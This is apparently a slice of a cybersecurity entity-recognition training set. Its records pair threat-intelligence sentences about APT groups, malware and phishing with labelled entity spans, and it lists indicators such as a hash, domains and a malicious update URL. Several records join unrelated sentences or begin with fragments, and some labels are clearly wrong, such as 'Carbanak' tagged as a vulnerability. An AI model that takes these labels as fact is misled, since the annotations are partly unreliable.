Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . 
Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members .", "spans": {"MALWARE: MXI Player": [[0, 10]]}, "info": {"id": "cyberner_stix_train_004888", "source": "cyberner_stix_train"}} {"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , government , and media for espionage and destructive purposes , since at least 2011 . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": {"TOOL: Black Energy": [[117, 129]], "ORGANIZATION: energy": [[165, 171]], "ORGANIZATION: government": [[174, 184]], "ORGANIZATION: media": [[191, 196]], "THREAT_ACTOR: espionage": [[201, 210]], "ORGANIZATION: government agencies": [[365, 384]], "ORGANIZATION: Fatah political party": [[393, 414]]}, "info": {"id": "cyberner_stix_train_004889", "source": "cyberner_stix_train"}} {"text": "Technical analysis Most of this new attack ’ s routines are similar to those of the previous XLoader versions . Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE . The table below describes the operational mode, record types used, and the method used to send the . 
According to a recent V3.co.uk article , 95 percent of companies have already fallen victim to attacks from advanced malware and suffer from an average of 643 successful infections per week .", "spans": {"MALWARE: XLoader": [[93, 100]], "ORGANIZATION: Arbor": [[137, 142]], "ORGANIZATION: FireEye": [[155, 162]], "THREAT_ACTOR: APT12": [[176, 181]], "TOOL: HIGHTIDE": [[219, 227]], "ORGANIZATION: V3.co.uk": [[353, 361]], "ORGANIZATION: companies": [[386, 395]], "MALWARE: malware": [[448, 455]]}, "info": {"id": "cyberner_stix_train_004890", "source": "cyberner_stix_train"}} {"text": "The Evidence Collector module is responsible for the spying routines outlined above . The first successful bank robbery was committed by this group in January 2013 . , Anonymous Sudan accounted for 63 % of total identified DDoS attacks claimed by the KillNet collective in 2023 .", "spans": {"THREAT_ACTOR: group": [[142, 147]], "THREAT_ACTOR: Anonymous Sudan": [[168, 183]], "THREAT_ACTOR: DDoS attacks": [[223, 235]]}, "info": {"id": "cyberner_stix_train_004891", "source": "cyberner_stix_train"}} {"text": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails . 
Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "MALWARE: malicious attachments": [[37, 58]], "MALWARE: malware": [[188, 195]], "FILEPATH: .lnk": [[250, 254]]}, "info": {"id": "cyberner_stix_train_004892", "source": "cyberner_stix_train"}} {"text": "Uploaded files are written to the server sub directory “ clients\\user_name@machine_name_ipaddress ” .", "spans": {"FILEPATH: clients\\user_name@machine_name_ipaddress": [[57, 97]]}, "info": {"id": "cyberner_stix_train_004893", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "VULNERABILITY: exploit": [[212, 219]], "MALWARE: keylogger": [[261, 270]], "MALWARE: backdoor": [[275, 283]], "MALWARE: malware": [[284, 291]]}, "info": {"id": "cyberner_stix_train_004894", "source": "cyberner_stix_train"}} {"text": "The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . 
Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "ORGANIZATION: aerospace": [[98, 107]], "ORGANIZATION: energy": [[110, 116]], "ORGANIZATION: government": [[119, 129]], "ORGANIZATION: high-tech": [[132, 141]], "ORGANIZATION: consulting services": [[144, 163]], "ORGANIZATION: chemicals": [[170, 179]], "ORGANIZATION: manufacturing": [[182, 195]], "ORGANIZATION: mining sectors": [[198, 212]], "ORGANIZATION: Palo Alto": [[244, 253]], "MALWARE: Infy": [[285, 289]]}, "info": {"id": "cyberner_stix_train_004895", "source": "cyberner_stix_train"}} {"text": "] qwe-japan [ . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . The send counter is initialized to 0 and read from the fourth octet of the A record returned by the . 
The series features interviews with security experts and journalists , Ashley Madison executives , victims of the breach and jilted spouses .", "spans": {"ORGANIZATION: governments": [[153, 164]], "ORGANIZATION: militaries": [[167, 177]], "ORGANIZATION: defense attaches": [[180, 196]], "ORGANIZATION: media entities": [[199, 213]], "ORGANIZATION: dissidents": [[220, 230]], "ORGANIZATION: figures": [[235, 242]], "ORGANIZATION: security experts": [[425, 441]], "ORGANIZATION: journalists": [[446, 457]], "ORGANIZATION: Ashley Madison executives": [[460, 485]], "ORGANIZATION: victims of the breach": [[488, 509]], "ORGANIZATION: jilted spouses": [[514, 528]]}, "info": {"id": "cyberner_stix_train_004896", "source": "cyberner_stix_train"}} {"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) .", "spans": {"TOOL: BitPaymer": [[56, 65]], "ORGANIZATION: National Health Service": [[108, 131]], "ORGANIZATION: NHS": [[134, 137]], "THREAT_ACTOR: ScarCruft group": [[215, 230]]}, "info": {"id": "cyberner_stix_train_004897", "source": "cyberner_stix_train"}} {"text": "Meanwhile , HammerDuke is a Windows only malware ( written in .NET ) and comes in two variants .", "spans": {"MALWARE: HammerDuke": [[12, 22]], "SYSTEM: Windows": [[28, 35]], "TOOL: .NET": [[62, 66]]}, "info": {"id": "cyberner_stix_train_004898", "source": "cyberner_stix_train"}} {"text": "This overlap also points to a similar social engineering theme between these two campaigns , as both used content from upcoming military and defense conferences as a lure .", "spans": {}, "info": {"id": "cyberner_stix_train_004899", "source": "cyberner_stix_train"}} {"text": "The function “ NvReg ” is a wrapper for the API function RegisterClassW .", 
"spans": {}, "info": {"id": "cyberner_stix_train_004900", "source": "cyberner_stix_train"}} {"text": "In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials . CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"TOOL: Ismdoor RAT": [[22, 33]], "ORGANIZATION: CTU": [[118, 121]], "THREAT_ACTOR: TG-3390": [[152, 159]], "ORGANIZATION: Kaspersky": [[181, 190]]}, "info": {"id": "cyberner_stix_train_004901", "source": "cyberner_stix_train"}} {"text": "'' Debug information on logcat Another indicator is the amount of debugging information the trojan is still generating — a production-level trojan would keep its logging to a minimum . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( APT38 ) .", "spans": {"TOOL: Get-LAPSP.ps1": [[185, 198]], "TOOL: PowerShell script": [[204, 221]], "THREAT_ACTOR: groups": [[421, 427]], "THREAT_ACTOR: TEMP.Hermit": [[540, 551]], "THREAT_ACTOR: APT38": [[602, 607]]}, "info": {"id": "cyberner_stix_train_004902", "source": "cyberner_stix_train"}} {"text": "Victims/targets chosen ( Indian Embassy and Indian MEA officals ) .", "spans": {"ORGANIZATION: Indian Embassy": [[25, 39]], "ORGANIZATION: Indian MEA": [[44, 54]]}, "info": {"id": "cyberner_stix_train_004903", "source": "cyberner_stix_train"}} {"text": "MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . 
FrozenCell is the mobile component of a multi-platform attack we've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 \" , use to spy on victims through compromised mobile devices and desktops .", "spans": {"MALWARE: MXI Player": [[0, 10]], "MALWARE: FrozenCell": [[162, 172]], "THREAT_ACTOR: Scorpion/APT-C-23": [[272, 289]]}, "info": {"id": "cyberner_stix_train_004904", "source": "cyberner_stix_train"}} {"text": "As a result , it may be that are looking into a compromised , parked domain that was initially used legitimately , but is now participating in malicious activities . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system . TA459 is well-known for targeting organizations in Russia and neighboring countries .", "spans": {"THREAT_ACTOR: Leafminer": [[201, 210]], "TOOL: hacktools": [[326, 335]], "THREAT_ACTOR: TA459": [[409, 414]]}, "info": {"id": "cyberner_stix_train_004905", "source": "cyberner_stix_train"}} {"text": "It is worth noticing that this remote reverse shell does not employ any transport cryptography . Suckfly conducted a multistage attack between April 22 and May 4 . A screenshot from a website of the Palestinian government , showing a directory of the different ministries 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 . These requests are aimed at spreading the attack laterally within the network and can be investigated using Endpoint Detection and Response EDR solutions .", "spans": {"ORGANIZATION: Palestinian government": [[199, 221]], "FILEPATH: 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8": [[272, 336]]}, "info": {"id": "cyberner_stix_train_004906", "source": "cyberner_stix_train"}} {"text": "Data encryption : In the initial version of EventBot , the data being exfiltrated is encrypted using Base64 and RC4 . 
This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . FireEye asesses that APT32 actors may be aligned with the national interests of Vietnam .", "spans": {"MALWARE: EventBot": [[44, 52]], "MALWARE: RoyalDNS malware": [[169, 185]], "MALWARE: Ketrican": [[192, 200]], "ORGANIZATION: FireEye": [[217, 224]], "THREAT_ACTOR: APT32 actors": [[238, 250]]}, "info": {"id": "cyberner_stix_train_004907", "source": "cyberner_stix_train"}} {"text": "In some cases these objects are completely different , for example the server commands to get the file system .", "spans": {}, "info": {"id": "cyberner_stix_train_004908", "source": "cyberner_stix_train"}} {"text": "The life span of Android banking malware is limited to either the will of its author ( s ) to support it or the arrest of those actors . Machete relies on spearphishing to compromise its targets . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea .", "spans": {"SYSTEM: Android": [[17, 24]], "THREAT_ACTOR: Machete": [[137, 144]], "THREAT_ACTOR: APT38": [[306, 311]], "THREAT_ACTOR: cyber operators": [[322, 337]], "THREAT_ACTOR: TEMP.Hermit": [[348, 359]], "ORGANIZATION: Lab 110": [[380, 387]]}, "info": {"id": "cyberner_stix_train_004909", "source": "cyberner_stix_train"}} {"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . 
As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program .", "spans": {"MALWARE: PICKPOCKET": [[0, 10]], "ORGANIZATION: Group-IB": [[154, 162]], "MALWARE: Corkow": [[217, 223]]}, "info": {"id": "cyberner_stix_train_004910", "source": "cyberner_stix_train"}} {"text": "Our researches around the malware family revealed the \" Pitty Tiger \" group has been active since 2011 , yet we found traces which makes us believe the group is active since 2010 . In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report .", "spans": {"THREAT_ACTOR: Pitty Tiger": [[56, 67]], "THREAT_ACTOR: group": [[70, 75], [152, 157]]}, "info": {"id": "cyberner_stix_train_004911", "source": "cyberner_stix_train"}} {"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 .", "spans": {"MALWARE: exploit code": [[13, 25]], "FILEPATH: sample": [[303, 309]], "FILEPATH: Trochilus": [[329, 338]], "TOOL: DLL": [[370, 373]]}, "info": {"id": "cyberner_stix_train_004912", "source": "cyberner_stix_train"}} {"text": "Locate your device : Practice finding your device with Android Device Manager because you are far more likely to lose your device than install a PHA . Active since at least 2014 , the Leviathan has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe . 
The configuration data is simply a whitespace-separated list of strings . Other actors merged into this group : 1 UNC2529 is a well - resourced and experienced group that has targeted multiple organizations across numerous industries in a global phishing campaign .", "spans": {"SYSTEM: Android Device Manager": [[55, 77]], "THREAT_ACTOR: Leviathan": [[184, 193]], "ORGANIZATION: maritime industries": [[224, 243]], "ORGANIZATION: naval defense contractors": [[246, 271]], "ORGANIZATION: research institutions": [[289, 310]], "THREAT_ACTOR: UNC2529": [[467, 474]], "THREAT_ACTOR: well - resourced and experienced group that has targeted multiple organizations across numerous industries": [[480, 586]], "THREAT_ACTOR: global phishing campaign": [[592, 616]]}, "info": {"id": "cyberner_stix_train_004913", "source": "cyberner_stix_train"}} {"text": "Users who have configured their Android mobile device to receive work-related emails and allow installation of unsigned applications face the most risk of compromise . Wild Neutron 's tools include a password harvesting trojan , a reverse-shell backdoor and customized implementations of OpenSSH , WMIC and SMB . Based on our telemetry , we can reassemble ScarCruft ’s binary infection procedure . 
The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": {"SYSTEM: Android": [[32, 39]], "THREAT_ACTOR: Wild Neutron": [[168, 180]], "TOOL: password harvesting trojan": [[200, 226]], "TOOL: reverse-shell backdoor": [[231, 253]], "TOOL: customized implementations of OpenSSH": [[258, 295]], "TOOL: WMIC": [[298, 302]], "TOOL: SMB": [[307, 310]], "THREAT_ACTOR: ScarCruft": [[356, 365]], "TOOL: Google": [[466, 472]], "TOOL: Adobe": [[505, 510]]}, "info": {"id": "cyberner_stix_train_004914", "source": "cyberner_stix_train"}} {"text": "Figure 2 . After publishing our initial series of blogposts back in 2016 , Kaspersky have continued to track the ScarCruft threat actor . In various cases , the associated macro also scheduled tasks to make GRIFFON persistent . The software is centrally hosted on that third - party company ’s servers .", "spans": {"ORGANIZATION: Kaspersky": [[75, 84]], "THREAT_ACTOR: ScarCruft": [[113, 122]], "TOOL: macro": [[172, 177]], "MALWARE: GRIFFON": [[207, 214]], "SYSTEM: third - party company ’s servers": [[269, 301]]}, "info": {"id": "cyberner_stix_train_004915", "source": "cyberner_stix_train"}} {"text": "Two chunks are filled with an asynchronous procedure call ( APC ) routine code and a stub . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) . The backdoor DLL and the C2 communication DLLs are heavily obfuscated using high quantities of junk code , which significantly inflates their size and makes both static analysis and debugging more difficult . 
Wind farms in central Europe and internet users were also affected .", "spans": {"THREAT_ACTOR: hacking group": [[166, 179]], "THREAT_ACTOR: Ajax Security": [[197, 210]], "THREAT_ACTOR: Flying Kitten": [[228, 241]], "ORGANIZATION: CrowdStrike": [[247, 258]], "ORGANIZATION: dissidents": [[313, 323]], "TOOL: DLL": [[404, 407]], "TOOL: C2": [[416, 418]], "ORGANIZATION: Wind farms": [[600, 610]], "ORGANIZATION: central Europe": [[614, 628]], "ORGANIZATION: internet users": [[633, 647]]}, "info": {"id": "cyberner_stix_train_004916", "source": "cyberner_stix_train"}} {"text": ") VALUES ( 1 , 1 , 1 , 1 , 0 ) Finally , the malware modifies the ‘ Software\\Microsoft\\Windows\\CurrentVersion\\Run ’ registry key to enable autostart of the main module . While there is a clear underlying Qatar migrant workers theme in Operation Sheep , it is also hypothetically possible that these attacks could have been perpetrated by a malicious actor affiliated to a different government with an interest in damaging the reputation of the State of Qatar . FIN4 is unique in that they do not infect victims with typical persistent malware , but rather they focus on capturing credentials authorized to access email and other non-public correspondence .", "spans": {"THREAT_ACTOR: Operation Sheep": [[235, 250]], "THREAT_ACTOR: FIN4": [[461, 465]], "TOOL: email": [[613, 618]]}, "info": {"id": "cyberner_stix_train_004918", "source": "cyberner_stix_train"}} {"text": "Using these tactics Scarlet Mimic can directly target previously identified individuals ( spear phishing ) as well as unidentified individuals who are interested in a specific subject ( watering hole ) . 
Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[20, 33]], "EMAIL: watsonhenny@gmail.com": [[242, 263]], "ORGANIZATION: employees": [[305, 314]], "THREAT_ACTOR: APT38": [[343, 348]]}, "info": {"id": "cyberner_stix_train_004919", "source": "cyberner_stix_train"}} {"text": "The Windows kernel vulnerability ( CVE-2015-2387 ) existed in the open type font manager module ( ATMFD.dll ) and can be exploited to bypass the sandbox mitigation mechanism . One of the Cobalt Group 's latest campaigns , an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor , was investigated and presented by the Talos research team . Though the original implementation assumes an obfuscated function has only one control flow dispatcher , Compromise", "spans": {"VULNERABILITY: Windows kernel vulnerability": [[4, 32]], "VULNERABILITY: CVE-2015-2387": [[35, 48]], "THREAT_ACTOR: Cobalt Group": [[187, 199]], "TOOL: Cobalt": [[248, 254]], "TOOL: Strike beacon": [[255, 268]], "TOOL: JavaScript backdoor": [[276, 295]], "ORGANIZATION: Talos": [[336, 341]]}, "info": {"id": "cyberner_stix_train_004920", "source": "cyberner_stix_train"}} {"text": "PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines . 
It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries .", "spans": {"TOOL: PeddleCheap": [[0, 11]], "TOOL: DanderSpritz": [[27, 39]], "ORGANIZATION: public sector agencies": [[202, 224]], "ORGANIZATION: telecommunications": [[229, 247]], "ORGANIZATION: high-technology industries": [[258, 284]]}, "info": {"id": "cyberner_stix_train_004921", "source": "cyberner_stix_train"}} {"text": "cmstp.exe system restart , cmstp.exe will be used to execute the SCT file indirectly through the INF file . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": {"MALWARE: cmstp.exe": [[0, 9], [27, 36]], "MALWARE: SCT file": [[65, 73]], "MALWARE: INF file": [[97, 105]], "THREAT_ACTOR: APT34": [[127, 132]], "TOOL: Microsoft Office": [[147, 163]], "VULNERABILITY: CVE-2017-11882": [[178, 192]], "MALWARE: POWRUNER": [[203, 211]], "MALWARE: BONDUPDATER": [[216, 227]], "ORGANIZATION: Microsoft": [[251, 260]]}, "info": {"id": "cyberner_stix_train_004922", "source": "cyberner_stix_train"}} {"text": "Version 6.0 also adds a command called “ getPhoneState ” , which collects unique identifiers of mobile devices such as IMSI , ICCID , Android ID , and device serial number . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . The query to set the receive mode expects an A resource record response from the . 
Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": {"SYSTEM: Android": [[134, 141]], "THREAT_ACTOR: group": [[178, 183]], "ORGANIZATION: financial and policy organizations": [[212, 246]], "ORGANIZATION: audiences": [[335, 344]]}, "info": {"id": "cyberner_stix_train_004923", "source": "cyberner_stix_train"}} {"text": "It uses the vulnerability to run code from userspace in the context of the kernel , which modifies the attacker ’s process token to have the same privileges as that of the System process .", "spans": {}, "info": {"id": "cyberner_stix_train_004924", "source": "cyberner_stix_train"}} {"text": "List of anti-virus packages that are checked The payload goes a long way to protect itself and checks for anti-virus software installed on the mobile device . By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . ShadowHammer : http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip . The size of the industry has been expanding in the US and globally , with significant revenue increases making it an appealing target for ransoms .", "spans": {"ORGANIZATION: high-tech": [[172, 181]], "ORGANIZATION: manufacturing": [[186, 199]], "THREAT_ACTOR: DragonOK": [[233, 241]], "ORGANIZATION: economic": [[291, 299]], "THREAT_ACTOR: ShadowHammer": [[312, 324]], "URL: http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip": [[327, 419]]}, "info": {"id": "cyberner_stix_train_004925", "source": "cyberner_stix_train"}} {"text": "However , the trojan replaces the '= ' by 'AAAZZZXXX ' , the '+ ' by '| ' and the '/ ' by ' . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . 
APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems .", "spans": {"TOOL: More_eggs": [[107, 116]], "THREAT_ACTOR: ITG08": [[133, 138]], "TOOL: offensive security tools": [[166, 190]], "TOOL: PowerShell scripts": [[195, 213]], "THREAT_ACTOR: APT38": [[264, 269]], "ORGANIZATION: financial institutions": [[391, 413]]}, "info": {"id": "cyberner_stix_train_004926", "source": "cyberner_stix_train"}} {"text": "] 230 [ . Based on the campaign identifiers found in PinchDuke samples discovered from 2009 , the targets of the Dukes group during that year included organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda . The script will utilize the hard coded DCOM object C08AFD90-F2A1-11D1-8455-00A0C91F3880 , which is the ClassID for the ShellBrowserWindow . Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY , we believe that the malware was possibly developed by either Rostelecom - Solar or an associated party to recreate real attack scenarios against energy grid assets .", "spans": {"TOOL: PinchDuke samples": [[53, 70]], "THREAT_ACTOR: Dukes group": [[113, 124]], "ORGANIZATION: Ministry of Defense": [[177, 196]], "ORGANIZATION: ministries of foreign affairs": [[216, 245]], "TOOL: DCOM": [[308, 312]], "TOOL: ShellBrowserWindow": [[388, 406]], "MALWARE: COSMICENERGY": [[499, 511]]}, "info": {"id": "cyberner_stix_train_004927", "source": "cyberner_stix_train"}} {"text": "Though Dridex is still bringing in criminal revenue for the actor after almost four years of operation , targeted wire fraud operations likely require lengthy planning . 
While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide .", "spans": {"TOOL: Dridex": [[7, 13]], "THREAT_ACTOR: While Silence": [[170, 183]], "ORGANIZATION: banks": [[216, 221]], "ORGANIZATION: Group-IB": [[224, 232]]}, "info": {"id": "cyberner_stix_train_004928", "source": "cyberner_stix_train"}} {"text": "Figure 7 . Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . From March 18 to 26 we observed the malware operating in multiple LOCs of the world .", "spans": {"MALWARE: Neptun": [[11, 17]], "THREAT_ACTOR: attackers": [[119, 128]]}, "info": {"id": "cyberner_stix_train_004929", "source": "cyberner_stix_train"}} {"text": "Screen capture and audio recording SpyNote RAT was able to take screen captures and , using the device ’ s microphone , listen to audio conversations . The exploit installs Silence’s loader , designed to download backdoors and other malicious programs . Artifacts indicated the involvement of the Cobalt that , according to Positive Technologies information , from August to October had performed similar successful attacks in Eastern Europe , and it 's likely that this group may will soon become active in the West .", "spans": {"MALWARE: SpyNote RAT": [[35, 46]], "VULNERABILITY: exploit": [[156, 163]], "THREAT_ACTOR: Silence’s": [[173, 182]], "THREAT_ACTOR: Cobalt": [[297, 303]], "ORGANIZATION: Technologies information": [[333, 357]]}, "info": {"id": "cyberner_stix_train_004930", "source": "cyberner_stix_train"}} {"text": "Sneaking unwanted or harmful functionality into popular , benign apps is a common practice among “ bad ” developers , and we are committed to tracking down such apps . First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan . 
Volgmer is a backdoor Trojan designed to provide covert access to a compromised system .", "spans": {"MALWARE: Bugat": [[231, 236]], "TOOL: banking Trojan": [[251, 265]], "MALWARE: Volgmer": [[268, 275]], "MALWARE: backdoor Trojan": [[281, 296]]}, "info": {"id": "cyberner_stix_train_004931", "source": "cyberner_stix_train"}} {"text": "These blobs contain the different parts of the configuration .", "spans": {}, "info": {"id": "cyberner_stix_train_004932", "source": "cyberner_stix_train"}} {"text": "FakeSpy is an information stealer used to steal SMS messages , send SMS messages , steal financial data , read account information and contact lists , steal application data , and do much more . While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam . Gallmaker 's targets are embassies of an Eastern European country .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: OceanLotus’": [[201, 212]], "ORGANIZATION: foreign governments": [[365, 384]], "ORGANIZATION: activists": [[387, 396]], "ORGANIZATION: dissidents": [[403, 413]], "THREAT_ACTOR: Gallmaker": [[437, 446]], "ORGANIZATION: embassies": [[462, 471]]}, "info": {"id": "cyberner_stix_train_004933", "source": "cyberner_stix_train"}} {"text": "The main catalyst for dedicated development by PINCHY SPIDER , however , has been an ongoing battle with cybersecurity providers that are actively developing GandCrab mitigations and decryptors . 
However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number .", "spans": {"THREAT_ACTOR: PINCHY SPIDER": [[47, 60]], "ORGANIZATION: cybersecurity providers": [[105, 128]], "TOOL: GandCrab": [[158, 166]], "ORGANIZATION: Symantec": [[226, 234]]}, "info": {"id": "cyberner_stix_train_004934", "source": "cyberner_stix_train"}} {"text": "Targeting Palestinians : The campaigns seems to target Palestinian individuals and entities , likely related to the Palestinian government .", "spans": {}, "info": {"id": "cyberner_stix_train_004935", "source": "cyberner_stix_train"}} {"text": "While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . According to cyber security researchers , Anchor Panda , who work directly for the Chinese PLA Navy , likely remains active .", "spans": {"VULNERABILITY: zero-day exploit": [[125, 141]], "VULNERABILITY: CVE-2014-4148": [[144, 157]]}, "info": {"id": "cyberner_stix_train_004936", "source": "cyberner_stix_train"}} {"text": "It has an incredibly wide-ranging protocol – about 100 commands – and an ability to bypass the Doze battery saver . Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents . In this section , we describe in detail an Elfin attack on a U.S. organization . 
Phishing attacks are more nuanced as they hinge on human error and prey on victims who may be busy , distracted or caught in an especially wellcrafted attack .", "spans": {"THREAT_ACTOR: Lazarus group": [[140, 153]], "ORGANIZATION: job recruiters": [[224, 238]], "THREAT_ACTOR: Elfin": [[320, 325]], "VULNERABILITY: human error": [[409, 420]], "ORGANIZATION: victims who may be busy , distracted or caught in an especially wellcrafted attack": [[433, 515]]}, "info": {"id": "cyberner_stix_train_004937", "source": "cyberner_stix_train"}} {"text": "The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_004938", "source": "cyberner_stix_train"}} {"text": "This was combined with the heavy use of py2exe to compile Python scripts .", "spans": {"TOOL: py2exe": [[40, 46]], "TOOL: Python": [[58, 64]]}, "info": {"id": "cyberner_stix_train_004939", "source": "cyberner_stix_train"}} {"text": "Distribution via botnets . According to the researchers , the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks . Although we do not have the component that dropped and executed this launcher , the presence of these files leads us to think that the initial execution of this launcher is done through DLL side-l S-TOOLoading . 
Monitor MSSQL Servers with access to OT systems and networks for evidence of : • Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": {"TOOL: JavaScript code": [[87, 102]], "TOOL: DLL side-l S-TOOLoading": [[403, 426]]}, "info": {"id": "cyberner_stix_train_004940", "source": "cyberner_stix_train"}} {"text": "These images appear normal in image viewers .", "spans": {"TOOL: images": [[6, 12]], "TOOL: image": [[30, 35]]}, "info": {"id": "cyberner_stix_train_004941", "source": "cyberner_stix_train"}} {"text": "At the time of writing we had no evidence of an exploit being used to obtain root privileges , though it is possible that the attackers used some unseen component to implement this feature . This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack . Over the past three years , the group has utilized a wide array of tools against its victims , ranging from custom built malware to off-the-shelf RATs , indicating a willingness to continually revise its tactics and find whatever tools it takes to compromise its next set of victims . Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"TOOL: Destover malware": [[231, 247]], "ORGANIZATION: Talos": [[708, 713]], "ORGANIZATION: Open Babel": [[779, 789]]}, "info": {"id": "cyberner_stix_train_004942", "source": "cyberner_stix_train"}} {"text": "Starting content observers and the main task loop to receive remote commands and exfiltrate data The app uses six techniques to collect user data : Repeated commands : use alarms to periodically repeat actions on the device to expose data , including gathering location data . The Leviathan , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 . 
